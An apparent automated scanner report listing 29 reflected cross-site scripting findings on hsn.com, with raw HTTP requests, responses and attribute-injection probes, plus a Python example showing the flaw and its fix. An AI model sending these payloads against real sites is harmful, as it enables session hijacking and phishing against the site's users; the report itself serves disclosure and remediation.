hsn.com | CWE-79 | XSS | Vulnerability Crawler

Cross Site Scripting, XSS, Vulnerability Crawler

Report generated by XSS.CX at Fri Dec 10 14:08:07 CST 2010.


Contents


1. Cross-site scripting (reflected)

1.1. http://beauty.hsn.com/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx [name of an arbitrarily supplied request parameter]

1.2. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [name of an arbitrarily supplied request parameter]

1.3. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [o parameter]

1.4. http://beauty.hsn.com/my-life-mary-j-blige-body-cream_p-6231368_xp.aspx [name of an arbitrarily supplied request parameter]

1.5. http://beauty.hsn.com/my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx [name of an arbitrarily supplied request parameter]

1.6. http://beauty.hsn.com/my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx [name of an arbitrarily supplied request parameter]

1.7. http://beauty.hsn.com/signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx [name of an arbitrarily supplied request parameter]

1.8. http://beauty.hsn.com/wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx [name of an arbitrarily supplied request parameter]

1.9. http://beauty.hsn.com/wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx [name of an arbitrarily supplied request parameter]

1.10. http://beauty.hsn.com/wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx [name of an arbitrarily supplied request parameter]

1.11. http://beauty.hsn.com/wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx [name of an arbitrarily supplied request parameter]

1.12. http://beauty.hsn.com/wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx [name of an arbitrarily supplied request parameter]

1.13. http://beauty.hsn.com/wei-east-wrinkle-relief-system_p-6119231_xp.aspx [name of an arbitrarily supplied request parameter]

1.14. http://cnt.hsn.com/alerts/Js [abtestid parameter]

1.15. http://cnt.hsn.com/alerts/Js [abtestval parameter]

1.16. https://cnt.hsn.com/alerts/Js [abtestid parameter]

1.17. https://cnt.hsn.com/alerts/Js [abtestval parameter]

1.18. http://jewelry.hsn.com/colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx [name of an arbitrarily supplied request parameter]

1.19. http://kitchen-dining.hsn.com/main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx [name of an arbitrarily supplied request parameter]

1.20. http://kitchen-dining.hsn.com/waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx [name of an arbitrarily supplied request parameter]

1.21. http://sports.hsn.com/steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx [name of an arbitrarily supplied request parameter]

1.22. http://sports.hsn.com/steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx [name of an arbitrarily supplied request parameter]

1.23. http://sports.hsn.com/steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx [name of an arbitrarily supplied request parameter]

1.24. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [name of an arbitrarily supplied request parameter]

1.25. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [nolnav parameter]

1.26. http://www.hsn.com/cs/default.aspx [cm_mmc parameter]

1.27. http://www.hsn.com/cs/default.aspx [cm_sp parameter]

1.28. http://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]

1.29. https://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 29 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain. Parameter names and values that are only ever generated by the application itself (tracking tags such as cm_mmc, A/B test identifiers, product option codes) should be matched against a tight allow-list of characters and lengths, and input which fails validation should be rejected rather than sanitised.

User input should be encoded for the context in which it is emitted at every point where it is copied into application responses. For the findings in this report the output context is a double-quoted HTML attribute value, so the double quotation mark must be encoded as &quot; along with the other HTML metacharacters (< > ' & and =); otherwise a single " in the input terminates the attribute and allows new attributes to be added to the tag.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://beauty.hsn.com/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c820"%20a%3db%20a4f378ebf79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c820" a=b a4f378ebf79 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx?3c820"%20a%3db%20a4f378ebf79=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:35:37 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2ffftf0aOx4sLxWYuMxot84&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fconair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx%3f3c820%22%2520a%253db%2520a4f378ebf79%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=S6o7HXFveYaKmnx65JPilg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:37 GMT; path=/
Set-Cookie: sessionid=id=xk2CTuXP9RMaBVdLxv6VRZMEGDd44ygsAREXECz77WChhIEH2grNqg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=aG4tGzcy9zVLmlaZDBmcarMZdfAOSBntVhlhPhqZmNlJxdBuP9nUlQ%3d%3d&abtid=s4CLvKGvFZdIIW7shqbCBU0DxYZxCEihMNqdtVOxs977QKYSEZi9UA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:37 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:35:37 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=9O%2bVFKokcv%2bx64lwXWHyaGzbwR2OHmNWfgYGUbtTciQ%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=60255B114274563A49F723844DFFF2E5; domain=.hsn.com; path=/
Set-Cookie: TLTHID=60255B114274563A49F723844DFFF2E5; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:35:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 103806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx?3c820" a=b a4f378ebf79=1&cm_mmc=sharingsite*email*PD*1062769"
shareTitle="Conair 400-Watt Soft Bonnet Hair Dryer at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-p
...[SNIP]...
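The response above shows what every product-page finding in this report has in common: the server percent-decodes the query string, rebuilds the page URL from it, appends its cm_mmc tracking tag and drops the result into the double-quoted shareUrl attribute without HTML-encoding it, so the " in the parameter name closes the attribute and a=b becomes a new attribute on the tag. The following Python is an added example written for this report; it is not HSN code and not the scanner's code. The host, path, query string and cm_mmc value are copied from the request and response of finding 1.1; the surrounding <a> element, the function names and the allow-list rule for parameter names are assumptions made for illustration. It reproduces the vulnerable rendering, runs the same confirmation check the scanner used (the probe appearing verbatim with its quote intact), parses the fragment the way a browser would to show the injected attribute, and then applies the two remediation layers from the section above.

```python
"""Attribute injection via the shareUrl attribute (finding 1.1) and its fix.

Added example for this report, not HSN or scanner code. HOST, PATH, RAW_QUERY
and CM_MMC are taken from finding 1.1; the <a> wrapper, function names and
the parameter-name allow-list are assumptions for illustration.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Request line from finding 1.1, exactly as the scanner sent it (quote unencoded).
HOST = "beauty.hsn.com"
PATH = "/conair-400-watt-soft-bonnet-hair-dryer_p-5575139_xp.aspx"
RAW_QUERY = '3c820"%20a%3db%20a4f378ebf79=1'
CM_MMC = "sharingsite*email*PD*1062769"  # tracking tag the page appends itself

# The scanner's probe is  prefix" a=b suffix ; it confirms the issue when that
# string comes back byte-for-byte.
PROBE_PREFIX, PROBE_SUFFIX = "3c820", "a4f378ebf79"


def decoded_query_pairs(raw_query):
    """Percent-decode the query the way the server did (%20 -> space, %3d -> =).

    The split on '=' happens before decoding, so the decoded parameter NAME
    is  3c820" a=b a4f378ebf79  and the value is '1'.
    """
    return parse_qsl(raw_query, keep_blank_values=True)


def render_share_link_vulnerable(host, path, pairs, cm_mmc):
    """Rebuild the page URL from decoded parameters and interpolate it raw.

    This mirrors the observed behaviour: the quote inside the parameter name
    lands unchanged inside a double-quoted attribute.
    """
    query = "&".join(f"{k}={v}" for k, v in pairs)
    share_url = f"http://{host}{path}?{query}&cm_mmc={cm_mmc}"
    return f'<a shareUrl="{share_url}" shareTitle="Share">Email this</a>'


# Layer 1 (input validation, assumed rule): application-generated parameter
# names never need quotes, spaces or '='. Reject anything outside this set.
PARAM_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]+$")


def validated_pairs(pairs):
    """Drop parameters whose names fail the allow-list (reject, do not sanitise)."""
    return [(k, v) for k, v in pairs if PARAM_NAME_RE.match(k)]


def render_share_link_fixed(host, path, pairs, cm_mmc):
    """Layer 2 (output encoding): HTML-encode the whole attribute value.

    html.escape(quote=True) turns " into &quot; and & into &amp;, so no input
    can terminate the attribute. (Percent-encoding the rebuilt query is also
    advisable, but the encoding at the output point is what closes the finding.)
    """
    query = "&".join(f"{k}={v}" for k, v in pairs)
    share_url = f"http://{host}{path}?{query}&cm_mmc={cm_mmc}"
    return f'<a shareUrl="{html.escape(share_url, quote=True)}" shareTitle="Share">Email this</a>'


class _FirstAnchorAttrs(HTMLParser):
    """Collect the attributes of the first <a> tag, as a browser would tokenize them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)  # names are lower-cased by the parser


def parsed_attributes(fragment):
    parser = _FirstAnchorAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.attrs or {}


def reflects_probe_unencoded(body, prefix=PROBE_PREFIX, suffix=PROBE_SUFFIX):
    """The scanner's confirmation check: the probe appears with its quote intact."""
    return f'{prefix}" a=b {suffix}' in body


def demo():
    pairs = decoded_query_pairs(RAW_QUERY)
    vulnerable = render_share_link_vulnerable(HOST, PATH, pairs, CM_MMC)
    fixed = render_share_link_fixed(HOST, PATH, pairs, CM_MMC)
    return {
        "vulnerable_reflects": reflects_probe_unencoded(vulnerable),  # True
        "vulnerable_attrs": parsed_attributes(vulnerable),            # has 'a': 'b'
        "fixed_reflects": reflects_probe_unencoded(fixed),            # False
        "fixed_attrs": parsed_attributes(fixed),                      # no 'a' key
        "validated": validated_pairs(pairs),                          # [] name rejected
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the vulnerable rendering the parser reports an attribute named a with value b, which is exactly the scanner's point: whatever can be written as an attribute here (an event handler on an element that fires them, for instance) is now under the attacker's control, and the scanner's failure to land a full JavaScript proof of concept only means its automated attempts were blocked, not that the injection is harmless. In the fixed rendering the same quote survives inside the shareUrl value as data and no extra attribute exists, while the validation layer rejects the hostile parameter name outright before rendering.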

1.2. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /korres-guava-luxury-body-set_p-6207210_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeb10"%20a%3db%206d75f597e16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aeb10" a=b 6d75f597e16 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /korres-guava-luxury-body-set_p-6207210_xp.aspx?aeb10"%20a%3db%206d75f597e16=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:56 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2b8FzYqZ8ETdnLpI4X2eOMT&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fkorres-guava-luxury-body-set_p-6207210_xp.aspx%3faeb10%22%2520a%253db%25206d75f597e16%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=Ej5QjQHtgR7G9u5pIYJeBw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:57 GMT; path=/
Set-Cookie: sessionid=id=zYmxGS%2bw9IUw23SjxxEF2s%2bVBmMqOZ0FNHDTmFPw%2brVX4H9sGDmddQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=jO%2bSd2EhE86zAEpj9LsgusPmwtBRVKawHj5sZY6WjVy6WqZqrH5Gdw%3d%3d&abtid=grSCswcjBpQukhVVZyArkt4Ns7PLc2BUsnLRsYKGmpca%2fA9sGAsy4A%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:57 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=%2bITHbgmE1bNmUfew9UZa%2fvwyrL7jGLLoeQbkJHhGHFk%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=42802E7D4064DCC37825F0A016CA167E; domain=.hsn.com; path=/
Set-Cookie: TLTHID=42802E7D4064DCC37825F0A016CA167E; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx?aeb10" a=b 6d75f597e16=1&cm_mmc=sharingsite*email*PD*102036"
shareTitle="Korres Guava Luxury Body Set at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-position: 0
...[SNIP]...

1.3. http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx [o parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /korres-guava-luxury-body-set_p-6207210_xp.aspx

Issue detail

The value of the o request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46231"%20a%3db%20029f826e562 was submitted in the o parameter. This input was echoed as 46231" a=b 029f826e562 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /korres-guava-luxury-body-set_p-6207210_xp.aspx?o=OTCM46231"%20a%3db%20029f826e562&ocm=OTCM HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2b8FzYqZ8ETdnLpI4X2eOMT&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:35:10 GMT; path=/
Set-Cookie: sitesession=o=OTCM46231%22+a%3db+029f826e562&pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fkorres-guava-luxury-body-set_p-6207210_xp.aspx%3fo%3dOTCM46231%22%2520a%253db%2520029f826e562%26ocm%3dOTCM; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=Ej5QjQHtgR7G9u5pIYJeBw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:10 GMT; path=/
Set-Cookie: sessionid=id=YpnHCILR%2ffwW0wS5g8ZB%2bNS1HgK9cYW8k%2fCJmbPW5TZX8LRb6Ap5Hw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=74n41%2f6gUM2bcfaF4ip%2fo%2fyEpZw6o2%2bYqoyHd9BR8GRWLOgwh5TXsw%3d%3d&abtid=uthHw8qGSi76a6KlK0%2bfGOJg0JKhBarFUHCXCZjTw2AhqE9iRY3icQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:10 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:35:10 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=o5a9PTf4tYgPUwTWtKIylUr2Y4owjbvk47fXG%2bKmrhI%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=27F9AC054DD7FA8B54FA598B00DE8D20; domain=.hsn.com; path=/
Set-Cookie: TLTHID=27F9AC054DD7FA8B54FA598B00DE8D20; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:35:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/korres-guava-luxury-body-set_p-6207210_xp.aspx?o=OTCM46231" a=b 029f826e562&ocm=OTCM&cm_mmc=sharingsite*email*PD*102036"
shareTitle="Korres Guava Luxury Body Set at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-posit
...[SNIP]...

1.4. http://beauty.hsn.com/my-life-mary-j-blige-body-cream_p-6231368_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /my-life-mary-j-blige-body-cream_p-6231368_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37174"%20a%3db%20201c33035a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37174" a=b 201c33035a0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /my-life-mary-j-blige-body-cream_p-6231368_xp.aspx?37174"%20a%3db%20201c33035a0=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:35 GMT; path=/
Set-Cookie: customer=ksUrl=MN4mbmq89OqyBYkGnxtEdYQ82x2i1%2bSo&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fmy-life-mary-j-blige-body-cream_p-6231368_xp.aspx%3f37174%22%2520a%253db%2520201c33035a0%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=CNJteWmoJh0Fs3%2b%2bGDwgtg%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:36 GMT; path=/
Set-Cookie: sessionid=id=fmEsLndDwqqRPMAitEkSHsAdnXP3gJfxde9D0bXk0jjjb98DKvx7Dw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=v8crZSNTdbq76rc8MQ3zOJj66rRMDABymlNA4AIsabrvwg6zHgVhyA%3d%3d&abtid=414XoXx7ynqJIWEsNNL9b4%2fF12efuWHg%2fdVZCaOrg4dWb1DmJAmqXw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:35 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:36 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=AuSEX%2fGyjDqtE0YqAYbaHYy4iqXOeqwntGjs0iY6IF8%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=F3B427854CBEAA1B8DC75CB7464BC570; domain=.hsn.com; path=/
Set-Cookie: TLTHID=F3B427854CBEAA1B8DC75CB7464BC570; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 120357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/my-life-mary-j-blige-body-cream_p-6231368_xp.aspx?37174" a=b 201c33035a0=1&cm_mmc=sharingsite*email*PD*104627"
shareTitle="My Life&#174; Mary J. Blige Body Cream - AutoShip at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="ba
...[SNIP]...

1.5. http://beauty.hsn.com/my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846b9"%20a%3db%2068a419e1b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 846b9" a=b 68a419e1b84 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx?846b9"%20a%3db%2068a419e1b84=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
